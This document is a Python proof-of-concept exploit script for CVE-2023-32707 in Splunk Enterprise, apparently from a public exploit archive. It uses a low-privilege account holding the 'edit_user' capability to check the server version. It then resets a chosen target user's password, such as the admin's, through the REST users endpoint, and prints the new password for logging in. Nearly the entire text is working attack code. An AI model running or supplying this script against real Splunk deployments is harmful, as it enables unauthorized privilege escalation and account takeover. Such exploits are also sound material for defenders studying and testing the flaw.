Splunk 9.0.5 - Admin Account Takeover - CVE-2023-32707

1. #!/usr/bin/env python3
2. #
3. # Exploit Title: Splunk 9.0.5 - admin account take over
4. # Author: [Redway Security](https://twitter.com/redwaysec))
5. # Discovery: [Santiago Lopez](https://twitter.com/santi_lopezz99)
6.  
7. #CVE: CVE-2023-32707
8.  
9. # Vendor Description: A low-privilege user who holds a role that has the `edit_user` capability assigned
10. # to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
11. #
12. # Versions Affected: Splunk Enterprise **below** 9.0.5, 8.2.11, and 8.1.14.
13. #
14. import argparse
15. import requests
16. import random
17. import string
18. import base64
19. # ignore warnings
20. import urllib3
21. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
22.  
23. # Parse command-line arguments
24. parser = argparse.ArgumentParser(description='Splunk Authentication')
25. parser.add_argument('--host', required=True, help='Splunk host or IP address')
26. parser.add_argument('--username', required=True, help='Splunk username')
27. parser.add_argument('--password', required=True, help='Splunk password')
28. parser.add_argument('--target-user', required=True, help='Target user')
29. parser.add_argument('--force-exploit', action='store_true',
30. help='Force exploit')
31.  
32. args = parser.parse_args()
33.  
34. # Splunk server settings
35. splunk_host = args.host.split(':')[0]
36. splunk_username = args.username
37. splunk_password = args.password
38. target_user = args.target_user
39. force_exploit = args.force_exploit
40.  
41. splunk_port = args.host.split(':')[1] if len(args.host.split(':')) > 1 else 8089
42. user_endpoint = f"https://{splunk_host}:{splunk_port}/services/authentication/users"
43.  
44. credentials = f"{splunk_username}:{splunk_password}"
45. base64_credentials = base64.b64encode(credentials.encode()).decode()
46. headers = {
47. 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0',
48. 'Authorization': f'Basic {base64_credentials}'
49.  
50. }
51. proxies = {
52. # 'http': '[http://127.0.0.1:8080'](<a href=),">http://127.0.0.1:8080',
53. # 'https': 'http://127.0.0.1:8080'
54. }
55.  
56. response = requests.get(f"{user_endpoint}/{splunk_username}?output_mode=json",
57. headers=headers, proxies=proxies, verify=False)
58.  
59. if response.status_code == 200:
60. affected_versions = ['9.0.4', '8.2.10', '8.1.13']
61. user = response.json()
62. splunk_version = user['generator']['version']
63. # This is not a good way to compare versions.
64. # There is a range of versions that are affected by this CVE, but this is just a PoC
65. # 8.1.0 to 8.1.13
66. # 8.2.0 to 8.2.10
67. # 9.0.0 to 9.0.4
68. print(f"Detected Splunk version '{splunk_version}'")
69. if any(splunk_version <= value for value in affected_versions) or force_exploit:
70. user_capabilities = user['entry'][0]['content']['capabilities']
71. if 'edit_user' in user_capabilities:
72. print(
73. f"User '{splunk_username}' has the 'edit_user' capability, which would make this target exploitable.")
74. new_password = ''.join(random.choice(
75. string.ascii_letters + string.digits) for _ in range(8))
76. change_password_payload = {
77. 'password': new_password,
78. 'force-change-pass': 0,
79. 'locked-out': 0
80. }
81. response = requests.post(f"{user_endpoint}/{target_user}?output_mode=json",
82. data=change_password_payload, headers=headers, proxies=proxies, verify=False)
83. if response.status_code == 200:
84. print(
85. f"Successfully taken over user '{target_user}', log into Splunk with the password '{new_password}'")
86. else:
87. print('Account takeover failed')
88. else:
89. print(
90. f"User '{splunk_username}' does not have the 'edit_user' capability, which makes this target not exploitable by this user.")
91. else:
92. print(f"Splunk version '{splunk_version}' is not affected by CVE-2023-32707")
93. else:
94. print(
95. f"Couldn't authenticate to Splunk server '{splunk_host}' with user '{splunk_username}' and password '{splunk_password}'")
96. exit(1)
97.